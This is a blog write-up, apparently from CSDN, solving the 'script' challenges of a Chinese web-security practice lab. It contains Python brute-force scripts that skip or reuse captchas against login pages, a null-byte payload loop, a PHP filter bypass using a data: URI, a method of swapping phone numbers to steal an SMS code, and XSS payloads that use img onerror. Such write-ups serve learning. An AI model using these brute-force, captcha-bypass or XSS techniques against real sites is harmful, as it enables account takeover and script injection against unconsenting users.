CTF [网络安全实验室] [脚本关]

已于 2022-08-02 18:37:49 修改
阅读量1.5w 收藏 6
点赞数 1
分类专栏: CTF日记 文章标签: 信息安全 网络安全 脚本语言
于 2021-05-04 16:15:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45253622/article/details/116398264
版权

脚本关

1.key又又找不到了?

emmmm 抓包放包key就出来了,和基础关的差不多。

2.快速口算

试着写下脚本:

# -*- codeing = utf-8 -*-
# @Time : 2021/5/4 10:46
# @Author : rexu
# @File : 2sadd.py
# @Software : PyCharm
import requests,re
s = requests.Session()

url = "http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php"
html = s.get(url).content.decode('utf-8')

reg = r'([0-9].+)=<'
pattern = re.compile(reg)
match = re.findall(pattern,html)

payload = {'v':eval(match[0])}
print(s.post(url,data=payload).text)

得key!

3.这个题目是空的。

找到可以表示空白的字符串,循环提交,找到成功的。

# -*- codeing = utf-8 -*-
# @Time : 2021/5/4 11:15
# @Author : rexu
# @File : null.py
# @Software : PyCharm
import requests
url = ""
payloads = ["%00","%0a","%0d","%0a","%0d","%0b","%0c","%a0","null","none"]
for i in payloads:
    r = requests.get(url,params={'':'i'})
    if r.status_code == 200:
        print(i)
    else:
        print("error")
#null是对的

4.怎么就是不弹出key呢?

抓包或者F12查看源码如下:

        <script>
            
            function alert(a){
            	return false;
            }
            document.write=function(){
            	return false;
            }
            function prompt(a){
            	return false;
            }
            var a=function (){
               var b=function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1s(1e(p,a,c,k,e,r){e=1e(c){1d(c<a?\'\':e(1p(c/a)))+((c=c%a)>1q?1f.1j(c+1k):c.1n(1o))};1g(!\'\'.1h(/^/,1f)){1i(c--)r[e(c)]=k[c]||e(c);k=[1e(e){1d r[e]}];e=1e(){1d\'\\\\w+\'};c=1};1i(c--)1g(k[c])p=p.1h(1l 1m(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c]);1d p}(\'Y(R(p,a,c,k,e,r){e=R(c){S(c<a?\\\'\\\':e(18(c/a)))+((c=c%a)>17?T.16(c+15):c.12(13))};U(!\\\'\\\'.V(/^/,T)){W(c--)r[e(c)]=k[c]||e(c);k=[R(e){S r[e]}];e=R(){S\\\'\\\\\\\\w+\\\'};c=1};W(c--)U(k[c])p=p.V(Z 11(\\\'\\\\\\\\b\\\'+e(c)+\\\'\\\\\\\\b\\\',\\\'g\\\'),k[c]);S p}(\\\'G(B(p,a,c,k,e,r){e=B(c){A c.L(a)};E(!\\\\\\\'\\\\\\\'.C(/^/,F)){D(c--)r[e(c)]=k[c]||e(c);k=[B(e){A r[e]}];e=B(){A\\\\\\\'\\\\\\\\\\\\\\\\w+\\\\\\\'};c=1};D(c--)E(k[c])p=p.C(I J(\\\\\\\'\\\\\\\\\\\\\\\\b\\\\\\\'+e(c)+\\\\\\\'\\\\\\\\\\\\\\\\b\\\\\\\',\\\\\\\'g\\\\\\\'),k[c]);A p}(\\\\\\\'t(h(p,a,c,k,e,r){e=o;n(!\\\\\\\\\\\\\\\'\\\\\\\\\\\\\\\'.m(/^/,o)){l(c--)r[c]=k[c]||c;k=[h(e){f r[e]}];e=h(){f\\\\\\\\\\\\\\\'\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\w+\\\\\\\\\\\\\\\'};c=1};l(c--)n(k[c])p=p.m(q s(\\\\\\\\\\\\\\\'\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\b\\\\\\\\\\\\\\\'+e(c)+\\\\\\\\\\\\\\\'\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\b\\\\\\\\\\\\\\\',\\\\\\\\\\\\\\\'g\\\\\\\\\\\\\\\'),k[c]);f p}(\\\\\\\\\\\\\\\'1 3="6";1 4="7";1 5="";8(1 2=0;2<9;2++){5+=3+4}\\\\\\\\\\\\\\\',j,j,\\\\\\\\\\\\\\\'|u|i|b|c|d|v|x|y|j\\\\\\\\\\\\\\\'.z(\\\\\\\\\\\\\\\'|\\\\\\\\\\\\\\\'),0,{}))\\\\\\\',H,H,\\\\\\\'|||||||||||||||A||B||M||D|C|E|F||I||J|G|N|O||P|Q|K\\\\\\\'.K(\\\\\\\'|\\\\\\\'),0,{}))\\\',X,X,\\\'||||||||||||||||||||||||||||||||||||S|R|V|W|U|T|Y|13|Z|11|14|12|10|19|1a|1b|1c\\\'.14(\\\'|\\\'),0,{}))\',1t,1u,\'|||||||||||||||||||||||||||||||||||||||||||||||||||||1e|1d|1f|1g|1h|1i|1v|1s|1l||1m|1n|1o|1r|1k|1j|1q|1p|1w|1x|1y|1z\'.1r(\'|\'),0,{}))',62,98,'|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||return|function|String|if|replace|while|fromCharCode|29|new|RegExp|toString|36|parseInt|35|split|eval|62|75|53|var|slakfj|teslkjsdflk|for'.split('|'),0,{});
               var d=eval(b);
               alert("key is first 14 chars"+d);
            }
        </script>

发现提示:提交前14个字符得到key。源码中有三个扰乱的函数return false;删除前3个函数,在本地重新运行,得到key。

学到了一种新的解题方法。

5.逗比验证法第一期:逗比的验证码,有没有难道不一样吗?

看提示好像是验证码不会变,我们抓包看看。

每次在不改正确的验证码的同时,修改密码,错误回显只有pwd error,的确,这是个逗比验证码;我们进行暴力破解,首先发送到Intruder模块;

1238登录得到key。

使用python脚本进行破解:

# -*- codeing = utf-8 -*-
# @Time : 2021/5/4 12:44
# @Author : rexu
# @File : burp.py
# @Software : PyCharm
import requests
s = requests.Session()


url = "http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/login.php"
headers  = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0",
    "Cookie": "PHPSESSID=4fd46a57c9beb76b5fd77aa0ccc954b7" #需要修改。
}
for i in range(1000,10000):
    payload = {"username":"admin","pwd":i,"vcode":"PFFQ"} #同样需要修改
    r = s.post(url,data=payload,headers=headers)
    print(i,r.text)

6.逗比验证码第二期。

这回验证码每次刷新一次就回变一次。

我们发现如果不提交验证码,会回显pwd error ,所以猜测可以改包不输入验证码来绕过。

同样的,使用burp爆破。

使用python:

# -*- codeing = utf-8 -*-
# @Time : 2021/5/4 13:06
# @Author : rexu
# @File : burp2.py
# @Software : PyCharm
import requests
s = requests.Session()

url = "http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/login.php"
headers = {
    "Cookie": "PHPSESSID=4fd46a57c9beb76b5fd77aa0ccc954b7"
}
for i in range(1000,10000):
    payload = {"username":"admin","pwd":i,"vcode":""}
    r = s.post(url,headers=headers,data=payload)
    print(i,r.content)

得key!

7.逗比的验证码第三期。

emmmmm

和第二期的验证码一样逗,不用输入验证码,然后爆破,python脚本也类似。

8.微笑一下就能过关了。

F12查看源码:

查看源代码:

代码审计题:

<?php  
    header("Content-type: text/html; charset=utf-8");
    if (isset($_GET['view-source'])) { 
        show_source(__FILE__); 
        exit(); 
    } 

    include('flag.php'); 

    $smile = 1;  

   if (!isset ($_GET['^_^'])) $smile = 0;    #^_^不为空
    if (preg_match ('/\./', $_GET['^_^'])) $smile = 0;  
    if (preg_match ('/%/', $_GET['^_^'])) $smile = 0;  
    if (preg_match ('/[0-9]/', $_GET['^_^'])) $smile = 0;  
    if (preg_match ('/http/', $_GET['^_^']) ) $smile = 0;  
    if (preg_match ('/https/', $_GET['^_^']) ) $smile = 0;  
    if (preg_match ('/ftp/', $_GET['^_^'])) $smile = 0;  
    if (preg_match ('/telnet/', $_GET['^_^'])) $smile = 0;  
    #"^_^"的值不能是  .  %  [0-9]  http  https  ftp  telnet  
    if (preg_match ('/_/', $_SERVER['QUERY_STRING'])) $smile = 0; 
    #^_^这个字符串不能有 _ 这个字符,所以这里我们编码绕过;_的编码为%5f
    if ($smile) { 
        #满足$smile!=0进入
        if (@file_exists ($_GET['^_^'])) $smile = 0;  
        #file_exists() 函数检查文件或目录是否存在,存在返回1;这里为了不让smile是0,则不能进入循环,则$_GET['^_^']不存在。
    }  
    if ($smile) { 
        $smile = @file_get_contents ($_GET['^_^']);  
        if ($smile === "(●'◡'●)") die($flag);  
        # $smile"必须等于"(●'◡'●)",也就是file_get_contents($_GET['^_^'])必须为"(●'◡'●)"
    }  
?>
编码后我们的输入为:^%5f^

$_GET['^_^']只能是字符串:(●'◡'●)

输入为:" ^%5f^=data:,(●'◡'●) "
后面又要通过file_get_contents()取出$_GET['^_^']里的值,而$_GET['^_^']又必须不存在。所以$_GET['^_^']只能是字符串"(●'◡'●)",不可能是文件名。那么file_get_contents()里的参数就应该是data:,所以我们输入就应该为" ^%5f^=data:,(●'◡'●) "

http://lab1.xseclab.com/base13_ead1b12e47ec7cc5390303831b779d47/index.php?^%5f^=data:,(%E2%97%8F%27%E2%97%A1%27%E2%97%8F)

得到key!

9.逗比的手机验证码。

显示登录框:

获取验证码登录后显示:

换手机号登录后发现:

抓包试试。

我们先抓6666结尾的包:

每次重发一回,验证码都会变,在这里我们把6666->6667发现:

发现不行。

我们抓取6667的包;

将这里的6667改为6666,发送:

登录得key

思路:66可得验证码,67不可得验证码,抓取67的包修改为66得验证码,配合67进行登录,找到key。

10.基情燃烧的岁月

进行爆破发现:

登录:

emmmm 使用99登录进行爆破:

登录:

11.验证码识别。

涉及未学到的python库,正在学。

12.xss1-基础

先用:<script>alert(1)</script>

使用:<script>alert(HackingLab)</script>

13.xss2-绕过

使用:<script>alert(HackingLab)</script>发现:

怀疑<script>被过滤;使用<img src=1 οnerrοr=alert(HackingLab)>成功绕过。

14.xss3-构造

F12查看源码,并构造payload如下:

构造闭合:><img src=1 οnerrοr=alert(1)

15.xss5-Principle很重要的XSS

再想想

carefree798
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
学习日记
weixin_44223191的博客
06-15 193
WEB实战篇 问题options方法有什么作用if-modified-since和if-none-match消息头的作用使用ssl时,浏览器如何与web代理实现互操作 问题 options方法有什么作用 HTTP协议中的OPTIONS方法是在RFC2616标准(现行的HTTP/1.1)引入的一种用于获取服务器支持的HTTP请求方法以及检查服务器性能的请求方法。 OPTIONS方法是用于请求获得由...
CTF入门之旅(三)
qinyuehong的博客
02-23 329
请使用微笑过 题目:http://lab1.xseclab.com/base13_ead1b12e47ec7cc5390303831b779d47/index.php 打开地址可以看到这样的题目界面,进一步打开其中的源代码。 include('flag.php'); $smile = 1; if (!isset ($_GET['^_^'])) $smile = 0; if (preg_match ('/\./', $_GET['^_^'])) $smile = 0;
网络安全实验室3.脚本
02-08 1810
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
CTF-网络信息安全攻防学习平台(脚本)
凝聚力安全团队
07-02 3479
脚本第一 题库地址:http://hackinglab.cn 第一 题目:         key又又找不到了         key分值: 200         key小明这次哭了,key又找不到了!!! key啊,你究竟藏到了哪里,为什么我看到的页面上都没
网络安全实验室CTF—选择题解析 writeup_使网络服务器中充斥着大量要求回复的信息消耗带宽(3)
2401_84545700的博客
05-14 612
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
$$a,PHP独有的可变变量
weixin_30814329的博客
03-24 246
所谓可变变量,就是一个变量的变量名可以动态的设置和使用。语法形式是PHP的特殊语法,其他语言中少见 有时候使用可变变量名是很方便的。就是说,一个变量的变量名可以动态的设置和使用。一个普通的变量通过声明来设置,例如: <?php $a = 'hello'; ?> 一个可变变量获取了一个普通变量的值作为这个可变变量的变量名。在上面的例子中 hello 使用了两个美元符号(...
CTF网络安全大赛工具包集合
12-21
针对网络安全大赛的部分方向所需要的工具的集合
网络安全攻防大赛ctf题目
03-09
网络安全攻防大赛ctf题目
360网络安全课程CTF入门视频.zip
最新发布
06-05
11-网络安全实验-永恒之蓝1.mp4 12-网络安全实验-永恒之蓝2.mp4 13-网络安全实验-永恒之蓝3.mp4 14-网络安全实验-永恒之蓝4.mp4 15-DVWA环境搭建-phpstudy使用方法.mp4 16-DVWA-文件上传漏洞基础.mp4 17-BurpSuite...
西华大学网络安全实验室入门指南1
08-08
西华大学网络安全实验室是一个专注于网络安全教育和研究的机构,成立于2017年,主要由该校的本科生组成。实验室的核心领域涵盖了渗透测试、逆向工程、漏洞利用和密码学,致力于培养全面发展的网络安全人才。自成立...
网络安全CTF比赛工具集(整合版)
01-04
涵盖在线工具以及其他好用的工具包, 在线工具:导航型站点,CTF大集合。 CTF工具包:包里有CTF的各种工具,包括逆向,解密,WEB,密码学等等,相当有用,可以方便地准备各种CTF比赛。
ctf刷题小结
quan9i的博客
05-15 6171
CTF刷题小记,文章同步于我的个人博客,欢迎大家访问
ctf实验室-2020-11-29
v_3483608762的博客
11-29 372
hack1ng_fo1_fun} 1,一开始差点密码劝退,原以为是base64,并且最后一个是+号,然后就写了个程序,把最后一个的加号的ascll码+18转成base64。但是猜错了????。然后在网上就开始一个个的看,会是啥密码。然后找到了是xxencode。下面这个大佬总结的蛮全的。 https://blog.csdn.net/weixin_44604541/article/details/109817480 2然后就是一个简单的逆向了,之前在buuctf都做过。也就是把(hack1ng_fo1_fun
CTF writeup 1_网络安全实验室
热门推荐
Troy
10-26 31万+
基础1.key在哪里? 过地址打开网址 “key就在这里中,你能找到他吗? ” 看看源代码有没有线索~果然<html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> </head> <body> key就在这里中,你能找到他吗?
ctf实验室 2020-11-25
v_3483608762的博客
11-26 332
web 小猪佩奇 首先上一波价值 “Money has never made man happy,nor will it;there is nothing in its nature to produce happiness.The more of it one has the more one wants.”–Benjamin Franklin 钱从没有使人感到快乐,永远都不会.本质上钱不会带来快乐.一个人钱越多就越想多. 1. 2.首先随便试了试,每个人的id,价格都是相应的价格。1,2,3都是wron
ctf实验室2020-11-28
v_3483608762的博客
11-28 336
一,自己出的题。一开始的苦海翻起爱恨压缩包就直接打开了。 里面有一个文本(元婴)和一个压缩包(2),打开文本文件发现是一串密码 (+++++ ++++[ ->+++ +++++ +<]>+ +++++ +++++ +++++ .<+++ +[->+ +++<] >++++ ++.-- --.-- ----- .<),应该不是难的猜到是Brainfuck。如果是头一次见呢,下次知道就好了,毕竟这个密码不是很难看出。 放到这个网站里就可以吧Brainfuck转成t
网络安全实验室CTF—基础 writeup
Senimo
08-02 4062
网络安全实验室CTF—基础 writeupkey在哪里?再加密一次你就得到key啦~猜猜这是经过了多少次加密?据说MD5加密很安全,真的是么?种族歧视HAHA浏览器key究竟在哪里?key又找不到了冒充登陆用户比较数字大小本地的诱惑就不让你访问 网络安全实验室CTF链接 key在哪里? 再加密一次你就得到key啦~ 猜猜这是经过了多少次加密? 据说MD5加密很安全,真的是么? 种族歧视 HAHA...
网络安全实验室|网络信息安全攻防学习平台(脚本
yuhongkui的专栏
01-10 2052
1.小明这次哭了,key又找不到了!!! key啊,你究竟藏到了哪里,为什么我看到的页面上都没有啊!!!!! 地址:http://lab1.xseclab.com/xss1_30ac8668cd453e7e387c76b132b140bb/index.php 正确答案:yougotit_script_now 答案解析:我们发现点击后又重定向了,在burpsuite的target里面我们...
php网络验证系统_网络信息安全实验室脚本(上)
weixin_39846364的博客
12-03 357
生如蝼蚁当立鸿鹄之志,命薄如纸应有不屈之心。俗话说的好前言自从接触了 python,学了点皮毛之后,我正式从一个脚本小子摇身一变升级为脚本老弟。在我的心目中,按能力和影响力的顺序,其实都有这样的排位:脚本小子,脚本老弟,脚本师傅,脚本大佬,脚本大神,脚本行者。脚本小子:自以为对工具用得很六,出神入化,实则不懂原理,半斤八两,更不会自己开发工具。脚本老弟:对工具的使用不再停留于表面,略懂点...
ctf网络空间安全大赛实验室领队策划
05-15
CTF(Capture The Flag)网络空间安全大赛是一项旨在提升网络安全技术能力的比赛,对于网络安全技术人员的培养和拓展具有非常重要的意义。CTF网络空间安全大赛实验室领队的角色,就是承担起比赛的策划和组织工作。 策划的过程主要分为三个阶段:前期准备、比赛设计、后期评估。在前期准备阶段,领队需要考虑比赛的目标、规则、时间、场地、人员等各种因素。比赛设计阶段,领队需要根据比赛的目标和规则,设计出题目和比赛环节,同时需要考虑各个环节之间的衔接和难度的递进。最后在后期评估阶段,领队需要对比赛进行总结和评估,发现不足并改进规则和设计。 除了策划和组织工作,实验室领队还需要注组员的培训和指导工作。他需要为实验室成员提供专业知识介绍、技术指导和团队建设等方面的支持。 因此,CTF网络空间安全大赛实验室领队是一项极其重要的工作,既需要在组织规划方面做出精准高效的决策,同时又需要注重技术和培训方面的知识传授和指导,只有这样才能打造出一支竞争力强、技术过硬的团队。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

carefree798

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值